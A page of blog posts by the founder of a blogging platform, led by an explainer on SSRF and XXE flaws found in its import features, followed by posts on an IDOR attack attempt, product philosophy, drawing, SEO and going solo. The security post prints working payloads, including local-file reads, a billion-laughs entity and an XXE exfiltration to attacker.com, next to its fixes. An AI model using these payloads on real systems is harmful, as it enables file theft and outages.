> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since you might run into this kind of vulnerability yourself, let me show you how SSRF and XXE vulnerabilities are exploited.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page:

```html
<img src="https://miro.medium.com/some-image.jpg">
```

I need to download the image, then re-upload it to Bunny.
During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny. Okay. But what happens if the user writes this:

```html
<img src="file:///etc/passwd">
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
<img src="http://localhost:8080/admin">
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress
}
```

But here, I still have a risk.
The user can write:

```html
<img src="https://attacker.com/innocent-image.jpg">
```

And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000
val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
...
&xxe;
```

This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly:

```xml
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?%file;'>">
%all;
```

Finally, to crash a server, the attacker could also have done this:

```xml
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!-- ... and so on, each level referencing the previous one ten times ... -->
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<title>&lol9;</title>
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.
We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()

// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

Hugo 3 months ago

Someone tried to hack me

Writizzy is barely two weeks old. Last week, I faced my first Black Hat attack. It wasn't a Bug Bounty probe; it was a **malicious attempt to delete production data**. This is how I detected and remediated the attack, and why this event cemented my philosophy of **'Pain in the Ass Driven Development'** for early-stage products.

## White Hat vs. Black Hat

Why am I calling this a black hat attack? You might say, a hacker is a hacker, regardless of intent. However, there are nuances to consider. You have the **White Hats**, who test your site and then report the vulnerabilities they find. It's quite common to be contacted by white hats, who also expect some compensation. However, this remains risky because the legal framework is often unclear, and the researcher could get into trouble. Therefore, the vast majority of white hats work within legally framed **Bug Bounty programs** provided by companies. The secondary benefit of these programs is guaranteeing payment for the vulnerabilities found. Within the white hat category, there is a second group, often referred to as [beg bounty](https://www.troyhunt.com/beg-bounties/). These are often people who have industrialized basic checks on websites, finding often minor flaws, and randomly contact sites hoping for a reward.

And then you have the **Black Hats**, with many different motivations:

- **Data theft:** The goal is to resell the information elsewhere.
- **Data destruction:** Driven by ideology, for fun, or for personal reasons.

It is undoubtedly this last scenario that presented itself to us last week. The attacker attempted to delete articles specifically from the [thomas-sanlis.com](https://thomas-sanlis.com) blog, and only that one.

## Detection

The attack took place on November 7th. I started receiving Sentry alerts regarding inconsistent usage, for example, **attempts to delete data that did not belong to the requesting author**.
Since the application is a Nuxt SSR application, the client communicates with the backend via an API. The attacker attempted to directly exploit the API by replacing the identifiers used, which is known as an **IDOR (Insecure Direct Object Reference)** vulnerability or, more generally, **Broken Access Control**. Fortunately, the API performs numerous server-side checks, notably by verifying the session information and its consistency with the received request. I was able to investigate the traces to find the author and the target.

The author created an account using a **disposable email address**. These mailboxes are frequently used to avoid leaving a trace. I'll come back to how to prevent this later. The target was the blog of Thomas Sanlis. A bit later, the same person attempted to change their account email to use Thomas's, likely with the goal of logging into his account, given the first attack failed.

## Remediation Actions

Writizzy was launched less than 2 weeks ago, so I hadn't yet implemented all the necessary protections. What was in place was enough to fend off the attack—hopefully; it's always hard to be 100% sure. But I knew certain parts needed to be more robust. I now have an arsenal of actions available:

- **Account blocking**.
- **Temporary blocking for brute force attacks** (temporary to prevent an attacker from also blocking all accounts they know are using the site).
- **Rate limiting** on certain actions and per IP.

I will also likely prohibit the use of disposable emails on the site. There are two main approaches for this:

- Calling an external API to validate the email (e.g., [debounce.io](http://debounce.io), [emailable.com](http://emailable.com), [captainverify.com](https://captainverify.com), etc.).
- Checking against an open-source list yourself. One of the best known seems to be [disposable-email-domains](https://github.com/disposable-email-domains/disposable-email-domains), but this requires a regular and automated update mechanism for the list.
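To illustrate the list-based approach, here is a minimal TypeScript sketch. The inline domain sample and function name are hypothetical; in practice the set would be built from the disposable-email-domains list and refreshed automatically.

```typescript
// Minimal sketch: reject signups whose email domain appears on a
// disposable-domain list. The inline sample is illustrative only; in
// production the set would be loaded from the disposable-email-domains
// project and refreshed on a schedule.
const disposableDomains = new Set([
  "mailinator.com",
  "yopmail.com",
  "10minutemail.com",
]);

export function isDisposableEmail(email: string): boolean {
  const at = email.lastIndexOf("@");
  if (at === -1) return false; // malformed; leave it to normal email validation
  const domain = email.slice(at + 1).trim().toLowerCase();
  return disposableDomains.has(domain);
}
```

At signup, a `true` result can either block the account outright or merely flag it for closer monitoring, depending on how aggressive you want to be with false positives.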
## Pain in the Ass Driven Development (PITADD)

This reminded me of a previous company I created. Moderation did not exist until the day one person contacted 1,000 people at once overnight. We created a moderation feature the very next day to prevent it from happening again. It is always a question of timing. It's difficult to anticipate everything, and it's expensive, too. So there is always a **balance between cost and risk**. This balance changes depending on the context—if you work in the medical field, for example. But you cannot build a bunker on Day 1 for a non-critical site. Of course, a necessary minimum is required and some basic things are non-negotiable, especially regarding data protection. But the rest comes as risks increase, such as when the company grows.

Here is my framework for risk arbitration (examples):

- **Data theft** is critical. It must be anticipated on **Day 1**.
- **Data loss** is important, but can be mitigated by backups. Implementation can be postponed a bit.
- **Spam** is an annoyance. It can be handled manually as long as the volume remains low.
- etc.

I categorize this arbitration as: **Pain in the Ass Driven Development.** This applies just as much to security, design, architecture, and so on. It's simply not possible to have the same level of maturity as a 10,000-person company from the start. You have to wait until it hurts, or until it risks hurting very badly. The trade-off is that you have to be responsive and have the right measurement tools in place (monitoring, alerts, logs, etc.), otherwise it's not a strategy, it's negligence.

Hugo 3 months ago

Being Opinionated

I built a company that ended up getting big (more than 600 people). And that's not always easy to manage. Especially because you constantly need to reaffirm what you are, and what you're not. We often talk about enshittification, and it happens a lot with software that grows too much: products get worse because they need to keep pleasing new users, new needs, address every edge case. This can create incredibly powerful tools, but also incredibly complex ones, and sometimes that complexity gets dumped straight onto the user. To be clear, I'm not saying it's inevitable. There are good products that have managed to grow well. But people don't realize the difficulty behind that growth:

- knowing how to say no
- knowing how to hide complexity. Because complexity doesn't mean complicated
- knowing when to cut things

Building a product is **making choices**. And all of this also applies to how you talk about your product. In the beginning, it's authentic by definition, because it's the creators talking directly. Sometimes it's clumsy, but it's direct, it's opinionated. The creator says where they want to go, what they are, and what they're not. Then over time, teams take over communications. You need to appeal to more people, attract new user segments, have a smoother message. There's a real risk at that point: trying to please everyone, you end up pleasing no one.

I was having this conversation earlier with Thomas about [writizzy](https://writizzy.com)'s homepage. It's deliberately very clean, very simple. Just a manifesto. That's it. It's rare to do that for a company with several million dollars in annual revenue. Because **you need to convert, right?!** I think in the beginning, you should focus on saying who you are. With my previous company, we had a manifesto for the first year. That manifesto laid out who we were and what we wanted to do.
> You're free to work freely People coming to the site didn't need to scroll for 5 minutes through dozens of beautifully designed blocks. The truth is, for a product you don't know, nobody does that. A new visitor needs to decide whether to continue in less than 10 seconds. There needs to be a strong statement somewhere that hooks them. And for us, that statement is who we are. And who we're not. **A blogging platform that doesn't waste your time.** This phrase isn't positive. Someone pointed that out to us. Why not just say "A blogging platform that saves your time"? True. It's more consensual. But we just showed up. We're inevitably going to be compared to others. That's natural. What the hell are we doing here? We're frustrated, and we're building this product in opposition to something. We want to create a simple product. But not simplistic. And beyond that, we want to give people back the ability to write easily, without being forced to show off on their professional network or create fake engagement on some bot-filled social media platform. Maybe tomorrow our homepage will be full of colorful blocks with flashy marketing slogans. Or not.

Hugo 3 months ago

Can You Still Learn to Draw in the Age of AI?

I started drawing as a teenager because I loved comics and several people around me worked or had worked in bookstores. I copied everything I could—comic book characters, European BDs. I got good at copying, but without mentors, I eventually plateaued. Then studies took over, professional life began, and I stopped drawing. Here are some of my last drawings, made in 1999:

::Gallery
---
photos:
  - src: "https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762035986119-latlktl.jpg"
    alt: "Magneto"
  - src: "https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762035990247-zmqo757.jpg"
    alt: "Xmen"
  - src: "https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762035995600-0vi7vkk.jpg"
    alt: "Witchblade"
---
::

## The golden age of YouTube

But in 2018, I thought we were living in amazing times. There were now tons of online resources to learn from. I found hundreds of talented artists on YouTube who reignited my desire to learn. I finally had everything at my fingertips to understand the basics I'd missed when I was younger: the Loomis method, proportions, perspective, inking techniques... So [I started again](https://www.instagram.com/corwinhakanai/). I drew traditionally with pencil, then ink, tried watercolor, and finally digital drawing. I felt steady progress, even though drawing is one of those skills where learning happens in plateaus. There are tough moments where you stagnate, and then something clicks and you leap forward again.

![Moon knight I drew for Inktober 2021](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762036626305-0pqp4c5.jpg)

It was better, but I still felt limited, especially since I wanted to write stories and tell them through drawings. The gap between being able to reproduce a drawing correctly and bringing a story to life is massive. But that's part of the game. Drawing is learned slowly, in stages.
I'd learned a lot, but now I needed to tackle composition rules, master lighting, understand how to structure a story, how to chain shots to guide the reader's eye to the right place, lettering, and many other things.

## And then AI arrived

DALL-E was born in 2021. Midjourney followed in 2022. Today in 2025, these AIs are incredible at creating drawings that I still can't produce after several years of training. A professional will always be better, but only after many, many years of experience. A beginner like me is quickly discouraged by the gap between my current knowledge and the minimum level needed to at least match an AI. That's what I call **"the AI wall"**. Digital tools got me back into drawing in 2018, but AI cooled my enthusiasm a few years later. I haven't drawn in a year. My last drawing post [on Instagram](https://www.instagram.com/corwinhakanai/) was at the end of 2023.

And I'm conflicted. I see people who, on the contrary, found new motivation in it. They couldn't draw but are now able to tell a story in comic form. Honestly, I could do the same, since the story I have in mind could use this medium. You could say it's the story that matters more than the drawing. There are plenty of counter-examples, but let's assume it's true for the sake of argument. Except I don't want to learn how to prompt an AI. It's less exciting than learning to master your line work and thinking about character design or composition.

## What about software development?

And in those moments, I draw a parallel with my job as a developer. I've reached a point where, like the professional artists I admire, AI doesn't scare me too much. I know how to use it as a tool and I'm still capable of doing what it produces. I can go faster with it, but also because I master the equivalent of the basic rules of drawing for my profession. I understand architecture, UX, security, etc. I am above the AI wall and I'm looking down from above.
But what about young people entering the tech industry today, who face the same AI wall I face as an artist? Who's going to take the time to learn the basics?

I was born in the last century. The year 2000 made me dream. There was a kind of technological mythology where we'd end up delegating all the tedious tasks to machines so we could focus on what interests us most: discussion, games, arts, creativity. And I admit I feel like we got a bit lost along the way and did the opposite. I hope I'm wrong.

On the other hand, will those basics be just as important in the future? In the past, driving meant adjusting the dynamo, setting the choke to enrich the air-fuel mixture, cranking a handle to start the engine. I imagine you needed to know much more about mechanics than you do today. But that doesn't stop me from driving. Cars have evolved. Computing tools are evolving too. Once AI masters all the basic aspects, won't the real skill simply be knowing how to dialogue properly with an AI? After all, some new comic book authors already produce work by prompting an AI; their job has changed compared to their equivalents from 20 years ago. It's quite likely the same will be true for software development.

Hugo 4 months ago

Good customer support isn't optional

I'm one of those people who consider customer support crucial. I hate products where customer service is absent, where they give irrelevant answers, or where they half-ass issues by dragging out resolution times hoping you'll just give up.

It's a differentiating factor between two products. It can take a tool from "ok tier" to "top tier" just because you have humans who are competent and actually solve your problems. The reverse is also true: a good product can become "meh tier" if it's poorly served by its customer service.

I talked a while back with [Jonathan Lefèvre](https://jonathanlefevre.com/), who wrote a book about how much of Capitaine Train's strength came from the quality of their support. If you're interested in the book, ["L'obsession du service client"](https://amzn.to/4n0TUge) ("The Customer Service Obsession"), you know what to do (sorry, it's in French).

Customer service is part of UX in the broadest sense. Many people think UX is just a coat of paint you slap on a website. That's not what UX is - it's the entire user experience: how you're addressed, how your problems are solved, how APIs are designed, the documentation. It's what makes Stripe beloved for dev experience, and why Amazon keeps crushing it.

Anyway, I care about this stuff. And right now, it's pretty cool - I've had a bunch of recent exchanges on [hakanai.io](http://hakanai.io) with users. And I'm quite proud of the feedback:

> I have also looked at other newsletter systems, but yours is the best so far because of the RSS feeds and the ability to edit the email appearance through the MJML coding.

> By the way, very good support

> Oh, great, let me tell you that this is one of the best supports I have experienced, thank you so much

> Hey, just wanted to thank you for this feature, already tested and everything was perfect!!! Will do any future recommendations I see for the platform. Thanks!!!!

So yeah. Building a company has ups and downs. This kind of message helps put the rough moments in perspective.

Hugo 4 months ago

What I Missed Working Solo

Building a product alone is hard. Not exactly breaking news, I know. But I don't think everyone gets why it's actually hard.

- Some say it's the financial risk.
- Others think it's not having all the necessary skills—development, sales, marketing, etc.
- And some imagine it can't scale.

I have trouble taking these three obstacles seriously. Developing software doesn't cost much, at least for building a prototype and testing it with small audiences. Scaling is a false problem: there are plenty of examples of solopreneurs making substantial revenue without needing to copy Netflix or Google. And even if it became an issue one day, that's what I'd call a good problem to have. As for learning, with blogs, online videos, and AI, it's now possible to do a lot on your own.

But that last point hides another problem. The issue isn't so much not having all the necessary skills, but not having conversations.

## Why I Know This

I started working as a freelancer in 2010. And even though I loved it, I quickly connected with a group of Parisian freelancers called "les zindeps." In 2011, I created a kind of freelance collective, an experimental company called Lateral-thoughts. That led to another company I founded in early 2013: Malt.

Working with others, at least for me, has always been an accelerator. Every discussion within these different groups created opportunities, little sparks that each lit fires, ultimately leading me to build a company with over 600 people.

So, first thing: working in a group is a sounding board that stimulates creativity.

Working in a group is also motivation to do more. Again, this is obviously personal, but being in a group can make the difference between procrastination and action. I'm sensitive to social pressure, and I'm constantly stimulated by new ideas.

Finally, working in a group allows you to challenge yourself. You're rarely right on your own.
I love those discussions that challenge certainties, change your mind, and lead to more inventive solutions. But I became a solopreneur again a year ago.

## Going Solo Again

Over the past year, I launched rssfeedpulse, which became blogtally, then [hakanai.io](http://hakanai.io). I'm happy with the result—the product is nice. But let's be honest, it's growing slowly. There are probably many reasons for that. One of them is that working alone, I deprived myself of some creativity, I set fewer constraints for myself, and I had no pushback—either to pivot the product or even kill it.

I'm not going to do that. I'm not killing [hakanai.io](http://hakanai.io). On the contrary, I'd like to test other approaches around the same concepts.

## Trying Something Different

Not long ago, I talked with [Thomas Sanlis](https://www.thomas-sanlis.com/). He's a solopreneur who has entered the very exclusive circle of successful solopreneurs with [uneed.best](http://uneed.best), which is gradually becoming a solid alternative to Product Hunt. He also wanted to test other ideas and work with a partner for more stimulation. So we talked and decided to try an experiment together on a new product.

I'll focus on what I love most: designing and building products. Thomas will bring his skills in communication and marketing. Though obviously, given our respective backgrounds, there will be plenty of moments where we'll each do a bit of everything.

That product is [writizzy](https://writizzy.com). It's a blogging platform, like Ghost or WordPress, but simpler, more modern, and more affordable. It obviously connects to the fact that I've been blogging for 20 years, created an open-source static blog generator called [bloggrify](https://bloggrify.com), and hakanai was already aimed at becoming a toolkit for static blogs.

That conversation happened just two weeks ago. The product is already live, and I've already felt the benefits I was talking about of not working alone.
We'll see what happens next :)

Hugo 4 months ago

SEO failure

Well, this is embarrassing. I just realized the SEO for [**hakanai.io**](http://hakanai.io) has been completely broken for months. SEO is, in theory, my one and only acquisition channel for the SaaS. But:

- 10 months after purchasing the domain name, I still have a mediocre **domain rating**: 14, compared to 36 for Bloggrify and 29 for my own blog.
- If I search for the name hakanai, I don't even find [**hakanai.io**](http://hakanai.io) in the search results.
- 400 unique visitors per month, when I was getting double that at the beginning of the year. That's a 50% drop starting in June - not exactly the growth curve you want to see.

Not great... I just discovered that a large part of my pages have been deindexed. I don't know why. I wonder whether Google at some point flagged the site as fraudulent, perhaps because of the **programmatic SEO** (pSEO) I had implemented with the [**Blog Starter Kit**](https://blog-starter-kit.hakanai.io/). The timing also seems to match the moment I moved the documentation, the blog, and the blog starter kit to subdomains. I made that choice because it was technically simpler, and many sources online seemed to say that subdomains and subdirectories were equivalent for SEO. There are quite a few conflicting opinions on this. What is certain is that my current result leans more in favor of subdirectories...

Anyway, I'm trying to fix it urgently. I've moved the blog and documentation back to subdirectories. And I set the entire blog starter kit to noindex to see if that changes anything. That was a week ago. For now, no result. It's a bit worrying. Let's see...

If you've dealt with Google deindexing issues before, I'm all ears. And if not, well, you'll get to watch me figure it out in real time. Maybe :)
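Having flipped noindex on across a whole starter kit, one thing I found handy was a quick way to verify which pages actually serve the directive. Here's a minimal sketch using only Python's standard library; the helper names are mine, and note that real pages can also receive noindex via the `X-Robots-Tag` HTTP header, which parsing the HTML alone won't catch:

```python
from html.parser import HTMLParser


class RobotsMetaParser(HTMLParser):
    """Collect the content of any <meta name="robots"> tags on a page."""

    def __init__(self):
        super().__init__()
        self.directives = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attrs = dict(attrs)
        # Attribute values can be None in html.parser, hence the "or".
        if (attrs.get("name") or "").lower() == "robots":
            self.directives.append((attrs.get("content") or "").lower())


def has_noindex(html: str) -> bool:
    """Return True if the HTML carries a robots noindex directive."""
    parser = RobotsMetaParser()
    parser.feed(html)
    return any("noindex" in directive for directive in self_directives(parser))


def self_directives(parser: RobotsMetaParser):
    return parser.directives
```

Pointing something like this at a sitemap's URLs would have shown me in minutes which pages Google was being told to drop.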

Hugo 4 months ago

Hello World

What better way to start a new blog than with the traditional Hello World that we all learn to code when we start programming?

So yes, I'm starting a new blog on Writizzy, because I'm going to eat my own dog food, as they say.

My name is Hugo Lassiège. I've been blogging since 2001. I started as a writer on [developpez.com](http://developpez.com), then got my own domain ([hakanai.free.fr](http://hakanai.free.fr)) on the hosting provider everyone in France used back then: [free.fr](http://free.fr). I moved through Joomla, then WordPress. I self-hosted for a while, then got tired of it because WordPress is a pain to maintain long-term and quickly becomes bloated. So I switched to [wordpress.com](http://wordpress.com). But I quickly found it too expensive, and I was looking for a different writing experience. So I built my own static site generator with Nuxt and eventually [open-sourced it as Bloggrify](https://bloggrify.com/).

A bit later, I launched [hakanai.io](http://hakanai.io) because, let's face it, a static blog lacks certain features, and I thought I could provide them. It's a SaaS that adds features like newsletters and blog analytics, and I have other ideas to turn it into a toolbox for static blogs.

Still, I'm well aware that many people are looking for a much simpler experience. So eventually, after a chance encounter, I decided to start [Writizzy](https://writizzy.com) - the platform you're reading this on - a managed blogging platform representing, I hope, the synthesis of over 20 years of writing blog posts.

I'm not abandoning my other blog [eventuallymaking.io](http://eventuallymaking.io), where I'll continue writing more technical articles and sharing experiences from my other life as the founder of [a startup](https://www.malt.com) that did pretty well in France and Europe. This blog will be more of a journal about building in public, thoughts on entrepreneurship, and work-life balance.
It'll be a bit all over the place: building Writizzy, Hakanai, and Bloggrify; what works, and what doesn't. It won't really be about technical stuff - I save that for my other blog. Instead, I'll talk about experiments and... we'll see. Anyway, welcome to this blog.
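P.S. No Hello World post is complete without the snippet itself, so for tradition's sake, here it is in Python:

```python
# The traditional first program: store the greeting, then print it.
message = "Hello, World!"
print(message)
```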
